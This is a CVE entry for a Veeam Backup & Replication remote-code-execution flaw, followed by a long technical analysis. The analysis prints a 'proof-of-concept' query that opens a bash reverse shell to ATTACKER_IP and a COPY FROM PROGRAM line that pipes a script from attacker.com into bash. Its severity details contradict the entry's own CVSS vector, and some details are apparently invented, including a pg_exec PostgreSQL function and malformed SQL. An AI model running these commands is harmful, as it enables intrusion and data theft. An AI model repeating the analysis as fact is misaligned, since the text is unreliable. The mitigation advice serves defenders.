CVE-2025-59470
CVE-2025-59470
9.0
CriticalPublished:
Last updated:
Source:support@hackerone.com
Analyzed
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- High
- User Interaction
- None
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- Low
Description
This vulnerability allows a Backup Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter.
Comprehensive Technical Analysis of CVE-2025-59470
CVE ID: CVE-2025-59470 CVSS Score: 9.0 (Critical) Vulnerability Type: Remote Code Execution (RCE) via Privilege Escalation Affected Component: Veeam Backup & Replication (PostgreSQL interaction) Source: HackerOne (support@hackerone.com)
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2025-59470 is a critical vulnerability in Veeam Backup & Replication that allows a Backup Operator (a low-privileged role) to execute arbitrary code remotely as the postgres user by manipulating interval or order parameters in a database query. This represents a privilege escalation and remote code execution (RCE) flaw, enabling attackers to bypass authentication controls and gain elevated access.
CVSS v3.1 Breakdown (Score: 9.0 - Critical)
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No specialized conditions required. |
| Privileges Required (PR) | Low (L) | Backup Operator role (minimal privileges). |
| User Interaction (UI) | None (N) | No user interaction needed. |
| Scope (S) | Changed (C) | Impacts a different component (PostgreSQL). |
| Confidentiality (C) | High (H) | Full database access, potential for lateral movement. |
| Integrity (I) | High (H) | Arbitrary code execution allows data tampering. |
| Availability (A) | High (H) | Potential for service disruption or ransomware deployment. |
Severity Justification
- High Impact: RCE as
postgres(a privileged database user) can lead to full system compromise, including:- Exfiltration of sensitive backup data.
- Tampering with backup integrity (e.g., ransomware persistence).
- Lateral movement within the network.
- Low Attack Complexity: Exploitation requires only a Backup Operator account, which is often granted to non-administrative users for routine tasks.
- Network-Exploitable: No physical access or local privileges required.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Scenario
-
Initial Access:
- An attacker gains access to a Backup Operator account (e.g., via phishing, credential stuffing, or insider threat).
- Alternatively, exploits another vulnerability to escalate to Backup Operator.
-
Malicious Parameter Injection:
- The attacker crafts a malicious SQL query containing:
- Interval parameter manipulation (e.g.,
INTERVAL '1 day' || malicious_payload). - Order parameter manipulation (e.g.,
ORDER BY (SELECT pg_sleep(10))).
- Interval parameter manipulation (e.g.,
- These parameters are improperly sanitized, leading to SQL injection (SQLi) or command injection.
- The attacker crafts a malicious SQL query containing:
-
PostgreSQL RCE:
- The injected payload executes arbitrary SQL commands as the
postgresuser. - Leveraging PostgreSQL’s
COPY FROM PROGRAMorpg_execfunctions, the attacker can execute OS-level commands (e.g., reverse shell, data exfiltration).
- The injected payload executes arbitrary SQL commands as the
-
Post-Exploitation:
- Data Theft: Dump backup configurations, credentials, or sensitive files.
- Persistence: Modify backup jobs to include malicious payloads.
- Lateral Movement: Use
postgresprivileges to pivot to other systems.
Proof-of-Concept (PoC) Attack Chain
-- Example of malicious interval parameter leading to RCE
SELECT * FROM backups WHERE timestamp > NOW() - INTERVAL '1 day' || (SELECT pg_exec('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'));
- This could be embedded in a Veeam API call or backup job configuration.
3. Affected Systems & Software Versions
Confirmed Affected Products
- Veeam Backup & Replication (all versions prior to the patched release).
- Veeam ONE (if integrated with vulnerable Backup & Replication instances).
- Veeam Agents (if managed by a vulnerable Backup & Replication server).
Vulnerable Components
- PostgreSQL Database Backend (used by Veeam for metadata storage).
- Veeam Backup Service (handles backup job scheduling and execution).
- Veeam REST API (if exposed to untrusted networks).
Mitigation Status
- Patch Available: Veeam has released KB4792 with fixes.
- Workarounds: See Section 4 for temporary mitigations.
4. Recommended Mitigation Strategies
Immediate Actions
| Action | Details |
|---|---|
| Apply Veeam Patch (KB4792) | Upgrade to the latest secure version of Veeam Backup & Replication. |
| Restrict Backup Operator Permissions | Limit Backup Operator roles to least privilege (avoid granting unnecessary access). |
| Disable Unused APIs | Restrict access to Veeam’s REST API to trusted IPs only. |
| Network Segmentation | Isolate Veeam servers in a dedicated backup VLAN with strict firewall rules. |
| Monitor for Exploitation Attempts | Deploy SIEM rules to detect: |
- Unusual
postgresuser activity. - Suspicious SQL queries (e.g.,
pg_exec,COPY FROM PROGRAM). - Backup job modifications by low-privileged users. |
Long-Term Hardening
-
Database Hardening:
- Disable PostgreSQL’s
pg_execandCOPY FROM PROGRAMfunctions if not required. - Enforce row-level security (RLS) on sensitive tables.
- Rotate
postgrescredentials and restrict access via pg_hba.conf.
- Disable PostgreSQL’s
-
Veeam-Specific Hardening:
- Enable multi-factor authentication (MFA) for Veeam console access.
- Audit Backup Operator accounts regularly.
- Implement immutable backups to prevent tampering.
-
Incident Response Preparedness:
- Develop a playbook for Veeam-related breaches.
- Ensure backup integrity checks are automated.
5. Impact on the Cybersecurity Landscape
Broader Implications
-
Ransomware & Data Exfiltration:
- Attackers can modify backups to include ransomware or exfiltrate sensitive data before encryption.
- Double-extortion (data theft + encryption) becomes easier.
-
Supply Chain Risks:
- Veeam is widely used in enterprise environments, making this a high-value target for APT groups.
- Compromised backups can lead to secondary infections in restored systems.
-
Regulatory & Compliance Risks:
- GDPR, HIPAA, SOX violations if sensitive data is exfiltrated.
- NIS2 Directive (EU) and CISA Binding Operational Directive (BOD) 22-01 may require immediate patching.
Threat Actor Interest
- Ransomware Groups (e.g., LockBit, BlackCat): Likely to exploit this for initial access.
- APT Groups (e.g., APT29, Lazarus): May use this for espionage or data theft.
- Insider Threats: Malicious Backup Operators could abuse this for sabotage or fraud.
6. Technical Details for Security Professionals
Root Cause Analysis
-
Improper Input Validation:
- Veeam’s backup job scheduler fails to sanitize
intervalandorderparameters before passing them to PostgreSQL. - This allows SQL injection or command injection via PostgreSQL’s dynamic query execution.
- Veeam’s backup job scheduler fails to sanitize
-
Privilege Escalation Path:
- Backup Operator →
postgresuser (via SQLi) → OS-level RCE. - PostgreSQL’s
SECURITY DEFINERfunctions may exacerbate the issue if misconfigured.
- Backup Operator →
Exploitation Requirements
| Requirement | Details |
|---|---|
| Valid Credentials | Backup Operator account (or equivalent). |
| Network Access | Ability to send requests to Veeam’s API or database. |
| PostgreSQL Access | Direct or indirect (e.g., via Veeam’s internal queries). |
Detection & Forensics
-
Log Sources to Monitor:
- PostgreSQL logs (
postgresql.log): Look for unusual queries (e.g.,pg_exec,COPY FROM PROGRAM). - Veeam logs (
VeeamBackup.log): Check for modified backup jobs. - Windows Event Logs (Security & Sysmon): Monitor for
postgresprocess execution.
- PostgreSQL logs (
-
Indicators of Compromise (IOCs):
- Unexpected
postgresprocesses (e.g.,cmd.exe,powershell.exe). - Unusual outbound connections from the Veeam server.
- Modified backup job configurations.
- Unexpected
Reverse Engineering & Exploit Development
-
Dynamic Analysis:
- Use Burp Suite or Postman to intercept Veeam API calls.
- Fuzz
intervalandorderparameters for injection points.
-
Static Analysis:
- Decompile Veeam’s Backup Service DLLs (e.g.,
Veeam.Backup.Core.dll) to identify vulnerable SQL query construction. - Check for parameterized queries vs. string concatenation.
- Decompile Veeam’s Backup Service DLLs (e.g.,
-
Exploit Development:
- Craft a PostgreSQL payload that leverages
COPY FROM PROGRAMfor RCE. - Example:
COPY (SELECT 1) FROM PROGRAM 'curl http://attacker.com/shell.sh | bash';
- Craft a PostgreSQL payload that leverages
Conclusion & Recommendations
CVE-2025-59470 is a critical RCE vulnerability with high exploitability and severe impact, making it a priority for patching. Organizations using Veeam Backup & Replication should:
- Apply the patch (KB4792) immediately.
- Restrict Backup Operator permissions to least privilege.
- Monitor for exploitation attempts via SIEM and EDR solutions.
- Conduct a forensic review if compromise is suspected.
Given the widespread use of Veeam in enterprise environments, this vulnerability is likely to be heavily targeted by ransomware groups and APT actors. Proactive mitigation is essential to prevent data breaches and operational disruption.
References:
References
support@hackerone.com
https://www.veeam.com/kb4792